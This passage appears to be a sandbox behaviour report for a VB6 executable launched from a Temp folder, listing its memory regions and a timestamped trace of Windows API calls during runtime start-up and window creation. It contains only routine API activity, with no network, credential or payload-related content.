"c:\\windows\\system32\\winnsi.dll") Region: id = 1072 start_va = 0x3a0000 end_va = 0x3a7fff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 1073 start_va = 0x73250000 end_va = 0x73261fff entry_point = 0x73250000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1074 start_va = 0x770d0000 end_va = 0x77104fff entry_point = 0x770d0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1075 start_va = 0x20c0000 end_va = 0x21fffff entry_point = 0x0 region_type = private name = "private_0x00000000020c0000" filename = "" Region: id = 1076 start_va = 0x20c0000 end_va = 0x21bffff entry_point = 0x0 region_type = private name = "private_0x00000000020c0000" filename = "" Region: id = 1077 start_va = 0x21c0000 end_va = 0x21fffff entry_point = 0x0 region_type = private name = "private_0x00000000021c0000" filename = "" Region: id = 1078 start_va = 0x75810000 end_va = 0x76459fff entry_point = 0x75810000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1079 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 1080 start_va = 0x77120000 end_va = 0x77176fff entry_point = 0x77120000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1081 start_va = 0x2200000 end_va = 0xa1fffff entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 1082 start_va = 0x400000 end_va = 0x429fff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1083 start_va = 0xa340000 end_va = 0xa47cfff entry_point = 0x0 region_type = private name = "private_0x000000000a340000" filename = "" Region: id = 1084 start_va = 0xa480000 end_va = 0xa6fafff entry_point = 0x0 region_type = private name = "private_0x000000000a480000" filename = "" Region: id = 1085 start_va = 0x3b0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 1086 start_va = 0x3b0000 end_va = 0x3d9fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1087 start_va = 0x3e0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 1088 start_va = 0xa200000 end_va = 0xa35ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a200000" filename = "" Region: id = 1461 start_va = 0x3e0000 end_va = 0x3ecfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 1462 start_va = 0x550000 end_va = 0x579fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1463 start_va = 0x590000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Thread: id = 63 os_tid = 0xb88 [0057.161] GetVersion () returned 0x1db10106 [0057.162] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c10000 [0057.166] GetProcAddress (hModule=0x76c10000, lpProcName="IsTNT") returned 0x0 [0057.167] VirtualAlloc (lpAddress=0x0, dwSize=0x400000, flAllocationType=0x2000, flProtect=0x4) returned 0x1310000 [0057.168] VirtualAlloc (lpAddress=0x1310000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x1310000 [0057.169] GetCurrentThreadId () returned 0xb88 [0057.169] GetCommandLineA () returned="\"C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe\"" [0057.169] GetEnvironmentStringsW () returned 0x1d3a98* [0057.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1166, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1166 [0057.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1166, lpMultiByteStr=0x13007d0, cbMultiByte=1166, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1166 [0057.169] FreeEnvironmentStringsW (penv=0x1d3a98) returned 1 [0057.169] GetStartupInfoA (in: lpStartupInfo=0x12f9d4 | out: lpStartupInfo=0x12f9d4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0057.169] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0057.169] GetFileType (hFile=0x3) returned 0x0 [0057.169] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0057.170] GetFileType (hFile=0x7) returned 0x0 [0057.170] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0057.170] GetFileType (hFile=0xb) returned 0x0 [0057.170] SetHandleCount (uNumber=0x20) returned 0x20 [0057.170] GetACP () returned 0x4e4 [0057.170] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12f9fc | out: lpCPInfo=0x12f9fc) returned 1 [0057.170] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72a4c528, nSize=0x104 | out: lpFilename="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\lambdoidtegument.exe")) returned 0x39 [0057.171] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x76c10000 [0057.171] GetProcAddress (hModule=0x76c10000, lpProcName="IsProcessorFeaturePresent") returned 0x76c676b5 [0057.171] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0057.172] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x60 [0057.172] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x64 [0057.172] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0057.172] GetModuleFileNameA (in: hModule=0x72940000, lpFilename=0x72a4e6c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MSVBVM60.DLL" (normalized: "c:\\windows\\system32\\msvbvm60.dll")) returned 0x20 [0057.172] GetVersion () returned 0x1db10106 [0057.172] lstrcmpiW (lpString1="A", lpString2="B") returned -1 [0057.174] GetUserDefaultLCID () returned 0x409 [0057.174] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="A", cchCount1=-1, lpString2="B", cchCount2=-1) returned 1 [0057.174] GetSystemMetrics (nIndex=5) returned 1 [0057.174] GetSystemMetrics (nIndex=6) returned 1 [0057.174] GetSystemMetrics (nIndex=11) returned 32 [0057.174] GetSystemMetrics (nIndex=12) returned 32 [0057.174] GetSystemMetrics (nIndex=34) returned 132 [0057.174] GetSystemMetrics (nIndex=35) returned 38 [0057.174] GetSystemMetrics (nIndex=0) returned 1440 [0057.174] GetSystemMetrics (nIndex=1) returned 900 [0057.174] GetSystemMetrics (nIndex=32) returned 8 [0057.174] GetSystemMetrics (nIndex=33) returned 8 [0057.174] GetSystemMetrics (nIndex=42) returned 0 [0057.174] GetStockObject (i=15) returned 0x188000b [0057.174] GetStockObject (i=7) returned 0x1b00017 [0057.174] GetStockObject (i=6) returned 0x1b00018 [0057.174] GetStockObject (i=8) returned 0x1b00016 [0057.174] GetStockObject (i=4) returned 0x1900011 [0057.174] GetStockObject (i=2) returned 0x1900012 [0057.174] GetStockObject (i=0) returned 0x1900010 [0057.174] GetStockObject (i=5) returned 0x1900015 [0057.175] GetStockObject (i=13) returned 0x18a002e [0057.175] GetDC (hWnd=0x0) returned 0x200107f3 [0057.175] GetTextExtentPointA (in: hdc=0x200107f3, lpString="0", c=1, lpsz=0x12f9f8 | out: lpsz=0x12f9f8) returned 1 [0057.176] GetDeviceCaps (hdc=0x200107f3, index=14) returned 1 [0057.176] GetDeviceCaps (hdc=0x200107f3, index=12) returned 32 [0057.176] GetDeviceCaps (hdc=0x200107f3, index=88) returned 96 [0057.176] GetDeviceCaps (hdc=0x200107f3, index=90) returned 96 [0057.176] GetDeviceCaps (hdc=0x200107f3, index=38) returned 32409 [0057.176] ReleaseDC (hWnd=0x0, hDC=0x200107f3) returned 1 [0057.177] CoGetMalloc (in: dwMemContext=0x1, ppMalloc=0x72a4e7d0 | out: ppMalloc=0x72a4e7d0*=0x768366bc) returned 0x0 [0057.177] GetCurrentThreadId () returned 0xb88 [0057.177] GetStartupInfoA (in: lpStartupInfo=0x12ff20 | out: lpStartupInfo=0x12ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0057.177] GetCurrentThreadId () returned 0xb88 [0057.177] GetCurrentThreadId () returned 0xb88 [0057.178] GetCommandLineA () returned="\"C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe\"" [0057.178] lstrlenA (lpString="") returned 0 [0057.178] lstrcpyA (in: lpString1=0x12feac, lpString2="" | out: lpString1="") returned="" [0057.178] SetErrorMode (uMode=0x8001) returned 0x1 [0057.178] GetModuleFileNameA (in: hModule=0x72940000, lpFilename=0x12fb68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MSVBVM60.DLL" (normalized: "c:\\windows\\system32\\msvbvm60.dll")) returned 0x20 [0057.178] GetUserDefaultLCID () returned 0x409 [0057.178] lstrcpyA (in: lpString1=0x12f868, lpString2="*" | out: lpString1="*") returned="*" [0057.178] LoadStringA (in: hInstance=0x72940000, uID=0x7d1, lpBuffer=0x12fc6c, cchBufferMax=8 | out: lpBuffer="409") returned 0x3 [0057.178] GetSystemDefaultLCID () returned 0x409 [0057.178] GetUserDefaultLCID () returned 0x409 [0057.178] GetLocaleInfoA (in: Locale=0x400, LCType=0xe, lpLCData=0x12fc76, cchData=2 | out: lpLCData=".") returned 2 [0057.178] GetStockObject (i=13) returned 0x18a002e [0057.178] GetObjectA (in: h=0x18a002e, c=60, pv=0x12fc3c | out: pv=0x12fc3c) returned 60 [0057.178] GetLocaleInfoA (in: Locale=0x409, LCType=0x80000003, lpLCData=0x12fc38, cchData=4 | out: lpLCData="ENU") returned 4 [0057.178] lstrcpyA (in: lpString1=0x12fc68, lpString2="EN" | out: lpString1="EN") returned="EN" [0057.178] lstrlenA (lpString="{xx}") returned 4 [0057.178] lstrlenA (lpString="VB98.CHM") returned 8 [0057.178] lstrcpyA (in: lpString1=0x72a4eae8, lpString2="VB98.CHM" | out: lpString1="VB98.CHM") returned="VB98.CHM" [0057.178] GetLocaleInfoA (in: Locale=0x409, LCType=0x80000003, lpLCData=0x12fc38, cchData=4 | out: lpLCData="ENU") returned 4 [0057.178] lstrcpyA (in: lpString1=0x12fc68, lpString2="EN" | out: lpString1="EN") returned="EN" [0057.178] lstrlenA (lpString="{xx}") returned 4 [0057.178] lstrlenA (lpString="VBENLR98.CHM") returned 12 [0057.178] lstrcpyA (in: lpString1=0x72a4ebf0, lpString2="VBENLR98.CHM" | out: lpString1="VBENLR98.CHM") returned="VBENLR98.CHM" [0057.178] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x12fd90, nSize=0x104 | out: lpFilename="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\lambdoidtegument.exe")) returned 0x39 [0057.178] GetModuleFileNameA (in: hModule=0x72940000, lpFilename=0x12fc8c, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MSVBVM60.DLL" (normalized: "c:\\windows\\system32\\msvbvm60.dll")) returned 0x20 [0057.178] lstrcpynA (in: lpString1=0x12fb70, lpString2="C:\\Windows\\system32\\MSVBVM60.DLL", iMaxLength=260 | out: lpString1="C:\\Windows\\system32\\MSVBVM60.DLL") returned="C:\\Windows\\system32\\MSVBVM60.DLL" [0057.178] lstrlenA (lpString="C:\\Windows\\system32\\MSVBVM60.DLL") returned 32 [0057.179] lstrcpyA (in: lpString1=0x1b617b0, lpString2="C:\\Windows\\system32\\MSVBVM60.DLL" | out: lpString1="C:\\Windows\\system32\\MSVBVM60.DLL") returned="C:\\Windows\\system32\\MSVBVM60.DLL" [0057.179] LCMapStringA (in: Locale=0x409, dwMapFlags=0x200, lpSrcStr="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe", cchSrc=-1, lpDestStr=0x12fb50, cchDest=260 | out: lpDestStr="C:\\USERS\\BGC6U8~1\\APPDATA\\LOCAL\\TEMP\\LAMBDOIDTEGUMENT.EXE") returned 58 [0057.180] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x12fc54, dwRevision=0x1 | out: pSecurityDescriptor=0x12fc54) returned 1 [0057.180] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0x12fc54, bDaclPresent=1, pDacl=0x0, bDaclDefaulted=0 | out: pSecurityDescriptor=0x12fc54) returned 1 [0057.180] CreateSemaphoreA (lpSemaphoreAttributes=0x12fc68, lInitialCount=0, lMaximumCount=2147483647, lpName="C:?USERS?BGC6U8~1?APPDATA?LOCAL?TEMP?LAMBDOIDTEGUMENT.EXE") returned 0x74 [0057.180] GetLastError () returned 0x0 [0057.180] GetVersionExA (in: lpVersionInformation=0x12fbcc*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12fbcc*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0057.180] OleInitialize (pvReserved=0x0) returned 0x0 [0057.193] OaBuildVersion () returned 0x321396 [0057.193] LoadLibraryA (lpLibFileName="OLEAUT32.DLL") returned 0x75580000 [0057.193] GetLastError () returned 0x0 [0057.193] GetProcAddress (hModule=0x75580000, lpProcName="OleLoadPictureEx") returned 0x755e70a1 [0057.193] RegisterClipboardFormatA (lpszFormat="Link") returned 0xc140 [0057.193] RegisterClipboardFormatA (lpszFormat="Rich Text Format") returned 0xc0b2 [0057.193] GetClassInfoA (in: hInstance=0x72940000, lpClassName="VBFocusRT6", lpWndClass=0x12fc34 | out: lpWndClass=0x12fc34) returned 0 [0057.193] RegisterClassA (lpWndClass=0x12fc34) returned 0xc19b [0057.194] GetClassInfoA (in: hInstance=0x72940000, lpClassName="VBBubbleRT6", lpWndClass=0x12fc34 | out: lpWndClass=0x12fc34) returned 0 [0057.194] RegisterClassA (lpWndClass=0x12fc34) returned 0xc19d [0057.194] GetUserDefaultLCID () returned 0x409 [0057.194] GetSystemInfo (in: lpSystemInfo=0x12fbf4 | out: lpSystemInfo=0x12fbf4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0057.194] VirtualAlloc (lpAddress=0x0, dwSize=0x10000, flAllocationType=0x2000, flProtect=0x4) returned 0x390000 [0057.213] VirtualAlloc (lpAddress=0x390000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x390000 [0057.213] VirtualAlloc (lpAddress=0x390000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x390000 [0057.213] VirtualAlloc (lpAddress=0x390000, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0x390000 [0057.213] VirtualAlloc (lpAddress=0x390000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x390000 [0057.213] VirtualAlloc (lpAddress=0x390000, dwSize=0x5000, flAllocationType=0x1000, flProtect=0x4) returned 0x390000 [0057.213] VirtualAlloc (lpAddress=0x390000, dwSize=0x6000, flAllocationType=0x1000, flProtect=0x4) returned 0x390000 [0057.214] VirtualProtect (in: lpAddress=0x390000, dwSize=0x6000, flNewProtect=0x20, lpflOldProtect=0x12fc50 | out: lpflOldProtect=0x12fc50*=0x4) returned 1 [0057.214] GetCurrentProcess () returned 0xffffffff [0057.214] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x390000, dwSize=0x6000) returned 1 [0057.214] GlobalAddAtomA (lpString="VBDisabled") returned 0xc108 [0057.214] GetVersion () returned 0x1db10106 [0057.214] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x75580000 [0057.214] GetProcAddress (hModule=0x75580000, lpProcName="DispCallFunc") returned 0x75593dcf [0057.214] GetProcAddress (hModule=0x75580000, lpProcName="LoadTypeLibEx") returned 0x755907b7 [0057.214] GetProcAddress (hModule=0x75580000, lpProcName="UnRegisterTypeLib") returned 0x755b1ca9 [0057.214] GetProcAddress (hModule=0x75580000, lpProcName="CreateTypeLib2") returned 0x75598e70 [0057.214] GetProcAddress (hModule=0x75580000, lpProcName="VarDateFromUdate") returned 0x75597684 [0057.214] GetProcAddress (hModule=0x75580000, lpProcName="VarUdateFromDate") returned 0x7559cc98 [0057.214] GetProcAddress (hModule=0x75580000, lpProcName="GetAltMonthNames") returned 0x755c903a [0057.214] GetProcAddress (hModule=0x75580000, lpProcName="VarNumFromParseNum") returned 0x75596231 [0057.214] GetProcAddress (hModule=0x75580000, lpProcName="VarParseNumFromStr") returned 0x75595fea [0057.214] GetProcAddress (hModule=0x75580000, lpProcName="VarDecFromR4") returned 0x755a3f94 [0057.215] GetProcAddress (hModule=0x75580000, lpProcName="VarDecFromR8") returned 0x755a4e9e [0057.215] GetProcAddress (hModule=0x75580000, lpProcName="VarDecFromDate") returned 0x755cdb72 [0057.215] GetProcAddress (hModule=0x75580000, lpProcName="VarDecFromI4") returned 0x755b2a8c [0057.215] GetProcAddress (hModule=0x75580000, lpProcName="VarDecFromCy") returned 0x755cd737 [0057.215] GetProcAddress (hModule=0x75580000, lpProcName="VarR4FromDec") returned 0x755ce015 [0057.215] GetProcAddress (hModule=0x75580000, lpProcName="GetRecordInfoFromTypeInfo") returned 0x755ccc3d [0057.215] GetProcAddress (hModule=0x75580000, lpProcName="GetRecordInfoFromGuids") returned 0x755cd1c4 [0057.215] GetProcAddress (hModule=0x75580000, lpProcName="SafeArrayGetRecordInfo") returned 0x755cd48c [0057.215] GetProcAddress (hModule=0x75580000, lpProcName="SafeArraySetRecordInfo") returned 0x755cd4c6 [0057.215] GetProcAddress (hModule=0x75580000, lpProcName="SafeArrayGetIID") returned 0x755cd509 [0057.215] GetProcAddress (hModule=0x75580000, lpProcName="SafeArraySetIID") returned 0x7559e7bb [0057.215] GetProcAddress (hModule=0x75580000, lpProcName="SafeArrayCopyData") returned 0x7559e496 [0057.215] GetProcAddress (hModule=0x75580000, lpProcName="SafeArrayAllocDescriptorEx") returned 0x7559ddf1 [0057.215] GetProcAddress (hModule=0x75580000, lpProcName="SafeArrayCreateEx") returned 0x755cd53f [0057.215] GetProcAddress (hModule=0x75580000, lpProcName="VarFormat") returned 0x755d2055 [0057.215] GetProcAddress (hModule=0x75580000, lpProcName="VarFormatDateTime") returned 0x755d20ea [0057.216] GetProcAddress (hModule=0x75580000, lpProcName="VarFormatNumber") returned 0x755d2151 [0057.216] GetProcAddress (hModule=0x75580000, lpProcName="VarFormatPercent") returned 0x755d21f5 [0057.216] GetProcAddress (hModule=0x75580000, lpProcName="VarFormatCurrency") returned 0x755d2288 [0057.216] GetProcAddress (hModule=0x75580000, lpProcName="VarWeekdayName") returned 0x755d2335 [0057.216] GetProcAddress (hModule=0x75580000, lpProcName="VarMonthName") returned 0x755d23d5 [0057.216] GetProcAddress (hModule=0x75580000, lpProcName="VarAdd") returned 0x755a5934 [0057.216] GetProcAddress (hModule=0x75580000, lpProcName="VarAnd") returned 0x755a5a98 [0057.216] GetProcAddress (hModule=0x75580000, lpProcName="VarCat") returned 0x755a59b4 [0057.216] GetProcAddress (hModule=0x75580000, lpProcName="VarDiv") returned 0x755fe405 [0057.216] GetProcAddress (hModule=0x75580000, lpProcName="VarEqv") returned 0x755fef07 [0057.216] GetProcAddress (hModule=0x75580000, lpProcName="VarIdiv") returned 0x755ff00a [0057.216] GetProcAddress (hModule=0x75580000, lpProcName="VarImp") returned 0x755fef47 [0057.216] GetProcAddress (hModule=0x75580000, lpProcName="VarMod") returned 0x755ff15e [0057.216] GetProcAddress (hModule=0x75580000, lpProcName="VarMul") returned 0x755fdbd4 [0057.216] GetProcAddress (hModule=0x75580000, lpProcName="VarOr") returned 0x755fecfa [0057.216] GetProcAddress (hModule=0x75580000, lpProcName="VarPow") returned 0x755fea66 [0057.216] GetProcAddress (hModule=0x75580000, lpProcName="VarSub") returned 0x755fd332 [0057.216] GetProcAddress (hModule=0x75580000, lpProcName="VarXor") returned 0x755fee2e [0057.217] GetProcAddress (hModule=0x75580000, lpProcName="VarAbs") returned 0x755fca11 [0057.217] GetProcAddress (hModule=0x75580000, lpProcName="VarFix") returned 0x755fcc5f [0057.217] GetProcAddress (hModule=0x75580000, lpProcName="VarInt") returned 0x755fcde7 [0057.217] GetProcAddress (hModule=0x75580000, lpProcName="VarNeg") returned 0x755fc802 [0057.217] GetProcAddress (hModule=0x75580000, lpProcName="VarNot") returned 0x755fec66 [0057.217] GetProcAddress (hModule=0x75580000, lpProcName="VarRound") returned 0x755fd155 [0057.217] GetProcAddress (hModule=0x75580000, lpProcName="VarCmp") returned 0x7559b0dc [0057.217] GetProcAddress (hModule=0x75580000, lpProcName="VarDecAdd") returned 0x755b5f3e [0057.217] GetProcAddress (hModule=0x75580000, lpProcName="VarDecCmp") returned 0x755a4fd0 [0057.217] GetProcAddress (hModule=0x75580000, lpProcName="VarBstrCat") returned 0x755a0d2c [0057.217] GetProcAddress (hModule=0x75580000, lpProcName="VarCyMulI4") returned 0x755b59ed [0057.217] GetProcAddress (hModule=0x75580000, lpProcName="VarBstrCmp") returned 0x7558f8b8 [0057.217] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x766f0000 [0057.217] GetProcAddress (hModule=0x766f0000, lpProcName="CoCreateInstanceEx") returned 0x76739d4e [0057.217] GetProcAddress (hModule=0x766f0000, lpProcName="CLSIDFromProgIDEx") returned 0x76700782 [0057.217] GetSystemMetrics (nIndex=42) returned 0 [0057.217] CoGetMalloc (in: dwMemContext=0x1, ppMalloc=0x72a4e688 | out: ppMalloc=0x72a4e688*=0x768366bc) returned 0x0 [0057.217] IMalloc:Alloc (This=0x768366bc, cb=0x4) returned 0x1d4290 [0057.217] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12f968, nSize=0x104 | out: lpFilename="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\lambdoidtegument.exe")) returned 0x39 [0057.249] lstrcatA (in: lpString1="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe", lpString2=".cfg" | out: lpString1="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe.cfg") returned="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe.cfg" [0057.250] SetLastError (dwErrCode=0x0) [0057.250] SearchPathA (in: lpPath=0x0, lpFileName="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe.cfg", lpExtension=0x0, nBufferLength=0x103, lpBuffer=0x12f864, lpFilePart=0x12f838 | out: lpBuffer="¤]úvÓ]úv_E\x11w\x88ú\x12", lpFilePart=0x12f838) returned 0x0 [0057.250] SetLastError (dwErrCode=0x2) [0057.250] GetLastError () returned 0x2 [0057.250] lstrcmpiA (lpString1="lambdoidtegument", lpString2="MTX") returned -1 [0057.250] lstrcmpiA (lpString1="lambdoidtegument", lpString2="DLLHOST") returned 1 [0057.250] lstrcmpiA (lpString1="lambdoidtegument", lpString2="INETINFO") returned 1 [0057.250] lstrcmpiA (lpString1="lambdoidtegument", lpString2="W3WP") returned -1 [0057.250] lstrcmpiA (lpString1="lambdoidtegument", lpString2="ASPNET_WP") returned 1 [0057.250] lstrcmpiA (lpString1="lambdoidtegument", lpString2="DLLHST3G") returned 1 [0057.250] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12f95c, nSize=0x104 | out: lpFilename="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\lambdoidtegument.exe")) returned 0x39 [0057.250] lstrcmpiA (lpString1="lambdoidtegument", lpString2="IEXPLORE") returned 1 [0057.250] LoadLibraryA (lpLibFileName="SXS.DLL") returned 0x75000000 [0057.251] GetLastError () returned 0x0 [0057.251] GetProcAddress (hModule=0x75000000, lpProcName="SxsOleAut32MapIIDOrCLSIDToTypeLibrary") returned 0x75047685 [0057.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x12feac, cbMultiByte=-1, lpWideCharStr=0x12fea8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0057.251] CoRegisterMessageFilter (in: lpMessageFilter=0x1b62054, lplpMessageFilter=0x1b6205c | out: lplpMessageFilter=0x1b6205c*=0x0) returned 0x0 [0057.251] IUnknown:AddRef (This=0x1b62054) returned 0x2 [0057.252] GetClassInfoExA (in: hInstance=0x72940000, lpszClass="ThunderRT6Main", lpwcx=0x12fe78 | out: lpwcx=0x12fe78) returned 0 [0057.252] LoadIconA (hInstance=0x400000, lpIconName=0x1) returned 0x80133 [0057.252] GetModuleHandleA (lpModuleName="USER32") returned 0x76620000 [0057.252] GetProcAddress (hModule=0x76620000, lpProcName="GetSystemMetrics") returned 0x766367cf [0057.252] GetProcAddress (hModule=0x76620000, lpProcName="MonitorFromWindow") returned 0x76633622 [0057.252] GetProcAddress (hModule=0x76620000, lpProcName="MonitorFromRect") returned 0x76630ca1 [0057.252] GetProcAddress (hModule=0x76620000, lpProcName="MonitorFromPoint") returned 0x766294c9 [0057.252] GetProcAddress (hModule=0x76620000, lpProcName="EnumDisplayMonitors") returned 0x766334a3 [0057.252] GetProcAddress (hModule=0x76620000, lpProcName="GetMonitorInfoA") returned 0x7662c34e [0057.252] GetSystemMetrics (nIndex=0) returned 1440 [0057.252] GetSystemMetrics (nIndex=78) returned 1440 [0057.252] GetSystemMetrics (nIndex=1) returned 900 [0057.252] GetSystemMetrics (nIndex=79) returned 900 [0057.252] GetSystemMetrics (nIndex=50) returned 16 [0057.252] GetSystemMetrics (nIndex=49) returned 16 [0057.252] LoadImageA (hInst=0x400000, name=0x1, type=0x1, cx=16, cy=16, fuLoad=0x0) returned 0x90087 [0057.253] RegisterClassExA (param_1=0x12fe78) returned 0x70c1cf [0057.253] CreateWindowExA (dwExStyle=0x80, lpClassName="ThunderRT6Main", lpWindowName=0x0, dwStyle=0x80090000, X=-2147483648, Y=-2147483648, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x301fc [0057.253] DefWindowProcA (hWnd=0x301fc, Msg=0x81, wParam=0x0, lParam=0x12fa5c) returned 0x1 [0057.254] DefWindowProcA (hWnd=0x301fc, Msg=0x83, wParam=0x0, lParam=0x12fa98) returned 0x0 [0057.254] DefWindowProcA (hWnd=0x301fc, Msg=0x1, wParam=0x0, lParam=0x12fa5c) returned 0x0 [0057.254] DefWindowProcA (hWnd=0x301fc, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0057.254] DefWindowProcA (hWnd=0x301fc, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0057.254] MonitorFromWindow (hwnd=0x301fc, dwFlags=0x2) returned 0x10001 [0057.254] GetMonitorInfoA (in: hMonitor=0x10001, lpmi=0x12fe80 | out: lpmi=0x12fe80) returned 1 [0057.254] SetWindowPos (hWnd=0x301fc, hWndInsertAfter=0x0, X=720, Y=450, cx=0, cy=0, uFlags=0x1d) returned 1 [0057.254] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12fe24) returned 0x0 [0057.255] DefWindowProcA (hWnd=0x301fc, Msg=0x47, wParam=0x0, lParam=0x12fe24) returned 0x0 [0057.255] DefWindowProcA (hWnd=0x301fc, Msg=0x3, wParam=0x0, lParam=0x1c202d0) returned 0x0 [0057.255] ShowWindow (hWnd=0x301fc, nCmdShow=4) returned 0 [0057.255] DefWindowProcA (hWnd=0x301fc, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0057.255] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, 